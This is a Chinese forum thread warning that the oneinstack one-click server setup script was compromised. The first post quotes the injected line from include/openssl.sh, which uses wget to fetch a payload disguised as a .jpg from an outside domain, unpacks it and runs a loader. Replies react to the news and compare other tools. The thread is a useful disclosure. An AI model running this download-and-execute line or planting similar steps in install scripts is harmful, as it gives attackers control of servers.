oneinstack一键网站环境脚本最近被挂马了!

查看 503|回复 7
作者:SK_   
[url]https://github.com/oneinstack/oneinstack/issues/487[/url]
挂马的文件在:/root/oneinstack/include/openssl.sh  137行,多了一段:[ol]wget http://download.cnoneinstack.com/oneinstack.jpg -cO /var/local/oneinstack.jpg && tar zxf /var/local/oneinstack.jpg -C /var/local/ && cd /var/local/cron && ./load [email protected][/ol]复制代码执行代码
github上 https://github.com/oneinstack/oneinstack/blob/main/include/openssl.sh 这个文件是没有这段代码的。
比对oneinstack-full.tar.gz的MD5码是不准的。要看/root/oneinstack/include/openssl.sh 这个文件,不知道黑客会不会留后门清理入侵痕迹,我另外一台几个月前搭建的这个文件没有这串代码。

代码, 文件, 几个

5ean   
看了一下,是真的,我去,我的服务器用的都是oneinstack,检查了一下没有这句
应该是刚被挂上马
klocal   
说好的 不用面板 最安全呢?
5ean   

klocal 发表于 2023-5-1 01:32
说好的 不用面板 最安全呢?

谁能想到源码被黑,挂上马呢,以后不敢用oneinstack了
七夏浅笑   
感觉用啥都有不安全的时候,不过还是用大佬都用的东西好,出问题了能及时被人发现
Xhvai110   
泰裤辣
燕十三丶   
一直用lnmp        
5ean   

燕十三丶 发表于 2023-5-1 01:41
一直用lnmp

还军哥靠谱,稳这么多年了
您需要登录后才可以回帖 登录 | 立即注册

返回顶部